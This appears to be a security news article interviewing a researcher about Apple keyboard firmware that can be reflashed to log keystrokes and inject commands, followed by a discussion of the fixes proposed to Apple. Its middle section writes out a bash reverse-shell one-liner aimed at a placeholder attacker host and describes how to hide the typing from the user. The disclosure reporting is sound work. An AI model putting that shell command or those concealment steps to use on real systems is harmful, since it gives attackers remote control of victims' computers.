I got a chance to interview the security researcher at DEFCON 2009 (another security conference, held immediately after BlackHat) who discovered this flaw. The researcher explained that he goes by the name “K. Chen” because he feared harassment from staunch Apple fans who actually believe those Mac versus PC security commercials. In the video below, I had Mr. Chen demonstrate his possessed keyboard on my computer, which had no special software installed. Whenever the ENTER key was pressed, the keyboard spat out, in reverse order, whatever had been typed into it. This showed that the keyboard had indeed been modified with special firmware that records what is typed and injects it back into the host computer. The key logging even works during the boot phase, before the operating system loads, so passwords typed to unlock hardware encryption can be captured as well.
Once this keyboard is possessed by an attacker, it can easily fire up a bash connect-back shell by launching a console and typing in a one-liner of the following form (the /dev/tcp redirect in the middle of the command was eaten by the web page’s HTML rendering; ATTACKER_HOST and PORT are placeholders for the attacker’s address and listening port):
exec /bin/sh 0</dev/tcp/ATTACKER_HOST/PORT 1>&0 2>&0
This instantly connects the computer to the attacker’s computer and gives the attacker full control of it, at which point additional rootkits can be installed. The redirect is a bash feature, so it must be typed into a bash console such as Terminal, and it replaces that console’s shell with one whose input and output are the network connection. While the typing would be visible to a human user while it is happening, that risk is minimized by waiting for an hour of keyboard inactivity first, and a simple “Open Apple + M” (Command-M) keystroke minimizes the console window, hiding its actions further.
What all this basically means is that this keyboard can betray any computer it attaches to by:
- Recording your password keystrokes
- Delivering your computer into the attacker’s hands
- Re-infecting your computer even after its hard drive has been completely wiped
Mr. Chen also explained that he had been working with Apple to come up with a solution, but that he feared Apple may be selecting the weaker fix: only blocking future revisions of Mac OS X from writing to the keyboard’s firmware. That would not prevent the keyboard from being reflashed by another computer running something other than the latest version of Mac OS X, nor does it guarantee that the protections in a patched Mac OS X cannot be bypassed. The cleaner solution Mr. Chen is proposing is that Apple simply lock the keyboard firmware against any future modification, since the keyboard does not implement any digital signature check on firmware updates.
I asked Mr. Chen why Apple would leave the firmware open, and he explained that Apple had a tendency to rush hardware to market, which has resulted in shipped keyboards with flaws that needed firmware updates. But because the keyboards are more mature today, perhaps it would not be a bad idea for Apple to lock in the firmware. I then asked Mr. Chen if he could produce a utility for consumers to lock their own keyboards, and he said yes, but he would rather wait for Apple’s finalized solution first. If the Apple solution is inadequate, he might revisit the possibility of producing a keyboard firmware locking utility. Until such time, buyers considering Apple keyboards have been warned.